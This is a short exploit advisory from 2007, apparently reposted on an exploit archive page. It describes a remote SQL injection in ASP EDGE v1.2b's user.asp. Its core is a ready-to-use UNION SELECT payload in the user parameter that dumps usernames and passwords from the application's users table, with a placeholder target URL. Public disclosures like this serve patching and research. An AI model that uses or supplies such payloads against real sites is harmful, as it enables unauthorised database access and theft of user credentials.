Home / os / win2k

aspedge12b-sql.txt

Posted on 27 January 2007

******************************************************************************* # Title : ASP EDGE <= V1.2b (user.asp) Remote SQL Injection Vulnerability # Author : ajann # Contact : :( # S.Page : http://aspedge.cjb.net || http://www.planetsourcecode.com/vb/scripts/ShowCode.asp?txtCodeId=7530&lngWId=4 # $$ : Free ******************************************************************************* [[SQL]]]--------------------------------------------------------- http://[target]/[path]//user.asp?user=[SQL] Example: //user.asp?user='union%20select%20username,0,username,0,password,0,0,0,0,0%20from%20users [[/SQL]] """"""""""""""""""""" # ajann,Turkey # ... # Im not Hacker!

 

TOP